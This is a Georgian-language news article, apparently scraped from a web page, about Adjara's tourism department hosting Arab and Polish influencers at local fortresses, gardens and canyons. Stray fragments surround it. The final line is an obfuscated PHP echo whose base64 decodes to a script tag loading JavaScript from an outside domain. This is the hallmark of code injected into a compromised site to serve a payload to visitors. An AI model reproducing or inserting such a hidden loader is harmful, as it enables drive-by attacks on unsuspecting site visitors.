celsiusi
ავერსი შნაიდერი

აჭარის ტურიზმის დეპარტამენტის მოწვევით რეგიონს არაბი და პოლონელი ინფლუენსერები სტუმრობდნენ. აღნიშნულის შესახებ ინფორმაციას აჭარის ავტონომიური რესპუბლიკის მთავრობის ტურიზმისა და კურორტების დეპარტამენტი ავრცელებს.

მათივე ცნობით, მედიატურის მონაწილეებმა პეტრასა და გონიოს ციხეები, ბათუმის ბოტანიკური ბაღი, მთიანი აჭარა და ბათუმის ძირითადი ტურისტული ღირსშესანიშნაობები მოინახულეს.

„სათავგადასავლო ტურიზმის მოყვარულებმა კაპნისთავის კანიონიც დალაშქრეს და მთიან აჭარაში მდებარე კოტეჯებს ესტუმრნენ. რეგიონში მოგზაურობის შთაბეჭდილებებს მოგზაურები „ინსტაგრამის“, „ტიკტოკის“, „ფეისბუქისა“ და „ლინკდინის“ მეშვეობით ასიათასობით გამომწერს უზიარებდნენ.

წელს, აჭარის ტურიზმის დეპარტამენტის ორგანიზებით რეგიონს 100-ზე მეტი ინფლუენსერი და ჟურნალისტი სტუმრობდა 15-მდე სამიზნე ქვეყნიდან. მათ შორის იყო დიდი ბრიტანეთი, დანია, იტალია, ისრაელი, არაბთა გაერთიანებული საამიროები, ინდოეთი, ჩინეთი, ყაზახეთი, ესტონეთი, ლატვია და ლიეტუვა. რეგიონის პოპულარიზაციას უცხოელი ჟურნალისტების მეშვეობით უწყება წლის ბოლომდე აქტიურად გააგრძელებს“, - აღნიშნულია ინფორმაციაში.

265
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");